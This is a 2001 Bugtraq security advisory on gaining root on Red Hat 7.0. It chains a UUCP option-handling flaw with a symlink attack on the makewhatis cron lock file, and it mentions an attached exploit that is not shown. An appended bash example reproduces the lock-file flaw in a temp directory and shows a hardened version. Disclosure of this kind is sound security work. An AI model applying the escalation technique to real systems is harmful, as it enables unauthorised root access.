Redhat 7.0 local root (via uucp) (attempt 2)


Date: Sat, 1 Dec 2001 01:56:52 +1300 (NZDT)
From: zen-parse <zen-parse@gmx.net>
To: bugtraq@securityfocus.com
Subject: Redhat 7.0 local root (via uucp) (attempt 2)


Affects:  RedHat 7.0 (possibly others)

28 Aug 2001 01:27:24 +1200 uucp vulnerability exposed to vendor
 9 Nov 2001 07:14:15 +1300 this makewhatis vulnerability exposed to vendor

/usr/sbin/makewhatis 

An earlier version(1) of makewhatis had a fault in the handling of 
compressed files that allowed execution of arbitrary commands as root.
 
A patch for this problem was developed that seemed to be effective.  
However, the patch was not restrictive enough in the metacharacters it
filtered out.

It is still possible to perform file creation or overwriting with
arbitrary contents, as root.


Taylor UUCP package and uucp exploit.

The uucp utilities fail to filter out long options, which lets users 
specify alternate configurations and as a result, execute commands with 
uid and gid uucp. (2)

Attached is an exploit for uucp (developed for RedHat 7.0, but other 
vulnerable distributions should be similar).


The root exploit.

drwxrwxr-x    4 root     uucp         4096 Nov 30 19:48 /var/lock/

On RH7.0 uucp allows arbitrary filename creation through the lockfile
creation performed by /etc/cron.{daily,weekly}/makewhatis.cron.

--- Start /etc/cron.daily/makewhatis.cron ---
#!/bin/bash

LOCKFILE=/var/lock/makewhatis.lock

# the lockfile is not meant to be perfect, it's just in case the
# two makewhatis cron scripts get run close to each other to keep
# them from stepping on each other's toes.  The worst that will
# happen is that they will temporarily corrupt the database...
[ -f $LOCKFILE ] && exit 0
trap "rm -f $LOCKFILE" EXIT
touch $LOCKFILE
makewhatis -u -w
exit 0
--- End /etc/cron.daily/makewhatis.cron ---

Simply symlinking /var/lock/makewhatis.lock to the filename you want to 
create will cause it to be created. 

This root exploit is only for RedHat 7.0, but a similar method may work on 
other distributions.


-- zen-parse
(1) http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=42450
Previous makewhatis problem.

(2) http://www.securityfocus.com/bid/3312
Taylor UUCP vulnerability.

(3) http://mp3.com/cosv
Some starving musicians.

This is my 2nd attempt to post this: if it was rejected for any reason
last time, would be nice to know why. If the previous one had just
disappeared, that would be strange.

-- 
-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.  
If this message was posted by zen-parse@gmx.net to a public forum it may
be redistributed as long as these conditions remain attached. If you are
mum or dad, this probably doesn't apply to you.

Attachment: redhat7.0-uucp-to-root.tar.gz (application/x-gzip; "redhat root via uucp exploit")
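
The lock file problem in the post comes from the check-then-touch sequence in makewhatis.cron. The script below is an added example (not part of the original post and not Red Hat's code) that runs that sequence in a throwaway directory next to a symlink-safe variant; the names legacy_lock, safe_lock, demo and victim are made up for the illustration.

```bash
#!/bin/bash
# Added example, not from the original post. Everything runs in a temp dir.

# Pattern used by makewhatis.cron: test with -f, then touch.
# [ -f ] is false for a dangling symlink and touch follows the link,
# so the link's target gets created with the caller's privileges.
legacy_lock() {
    [ -f "$1" ] && return 1
    touch "$1"
}

# Hardened form: reject a symlink outright, then create under noclobber.
# With set -C the shell will not overwrite an existing file and creates a
# missing one with O_EXCL, which fails on a symlink even if it dangles,
# so test and create are no longer two separate steps.
safe_lock() {
    [ -L "$1" ] && return 1
    ( set -C; : > "$1" ) 2>/dev/null
}

# Constructed scenario: $dir stands in for a lock directory that another
# account can write to; the lock name is pre-planted as a symlink.
demo() {
    dir=$(mktemp -d) || return 2
    ln -s "$dir/victim" "$dir/makewhatis.lock"

    if safe_lock "$dir/makewhatis.lock"; then s=acquired; else s=refused; fi
    if [ -e "$dir/victim" ]; then sv=created; else sv=absent; fi

    if legacy_lock "$dir/makewhatis.lock"; then l=acquired; else l=refused; fi
    if [ -e "$dir/victim" ]; then lv=created; else lv=absent; fi

    rm -rf "$dir"
    echo "safe_lock:   $s, link target $sv"
    echo "legacy_lock: $l, link target $lv"
}

demo
```

A lock created this way still belongs in a directory that only root can write to, which removes the planted-link case at its source.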
